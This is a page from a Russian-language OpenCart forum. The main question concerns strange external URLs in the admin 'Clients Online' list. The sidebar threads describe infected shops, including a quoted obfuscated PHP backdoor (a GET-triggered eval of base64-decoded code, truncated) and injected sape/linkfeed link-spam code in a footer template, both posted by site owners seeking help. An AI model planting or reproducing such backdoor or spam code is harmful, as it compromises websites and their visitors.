Jump to content
Sign in to follow this  
sashenka

Посторонние сайты вместо моих страниц в закладке Клиенты-Онлайн

Recommended Posts

Добрый день, потихоньку изучаю опенкарт 1.5.6 на своей сайте. Столкнулась со странной картиной пару дней назад.В  админ. панели  раздел "Клиенты онлайн" отображаются Ip посетителей и адреса страниц сайта где они находятся. Всегда там были страницы моего сайта, а теперь мелькают урлы сторонних не связанных с моим по тематике разнообразных сайтов.


Обратилась к хостингу на предмет попыток взлома и наличия вредоносного на сайте. Хостинг сказал все чисто. 


Что это такое как с этим бороться? Буду рада любым ответам и помощи. Спасибо.


Share this post


Link to post
Share on other sites

Пришлите скрины

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Similar Content

    • By Anton999
      Приветствую!
       
      Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
       
      Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
       
      Всем спасибо!
    • By proseotut
      Добрый день
      кто-то уже сталкивался с тем, что с сайта начинают торговать ссылками в невидимом блоке - добавили код в шаблон сайта, который размещает на страницах ссылки sape и linkfeed?
      появляются папки с id юзеров в папке: /catalog/view/image
      а коды размещения модуля на странице в контроллех прописаны и в шаблоне сайта
      пример такого кода в footer.php
      global $linkfeed; define('LINKFEED_USER', 'тут код одного юзера'); require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'.LINKFEED_USER.'/linkfeed.php'); $linkfeed = new LinkfeedClient(); global $sape; if (!defined('_SAPE_USER')){define('_SAPE_USER', 'тут код другого юзера');} require_once($_SERVER['DOCUMENT_ROOT'].'/catalog/view/image/'._SAPE_USER.'/sape.php'); $o = array(); $o['charset'] = 'UTF-8'; //ваша кодировка $o['force_show_code'] = false; //показать проверочный код $sape = new SAPE_client($o); ?> пример вывода в шаблоне, к сожалению, не сохранился(
      удалили, заменили доступы, прошло пару недель и он снова на сайте. 
      Если вы справились, подскажите решение, как исправить?
    • By ArtemPitov
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
    • By ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 1190 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось Обращение к серверу разработчика Нет  
    • By empty
      Добрый день.
       
      Перенес сайт на хостинг клиента, хостинг Hetcer, сайт https://confento.com, шаблон стандартный, и через некоторое время он оказался зараженным.
      Через ai-bolit прогнал, удалил все зараженные файлы, скрипты, заново рекурсивно в ISP панели выставил 755 на папки и 644 на файлы.
      Починил.
      Проходит дня 3-4 - ситуация повторилась вновь.
      .htaccess права с 644 сменил на 444, куча индексных файлов, index.html.bak.bak, в index.php ссылка на хедер вордпресса (оО), в айболите 8 заражений, куча каких то левых .php файлов.
      Все удалил, полазил по папкам, нашел кучу файлов левых, тоже удалил, снова права поправил.
      Но чувствую что в какой то момент снова может оказаться такая беда.
      Вот установленные дополнения - http://joxi.ru/4AkQEbOIydqozm - может кто в курсе, что с какого-то из них лезет вирусня.
       
      Подскажите пожалуйста, каким образом можно выявить, где уязвимость? Как узнать откуда лезет весь этот мусор?
      Так же - как можно защитить сайт от вирусных атак?
       
      Спасибо!
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.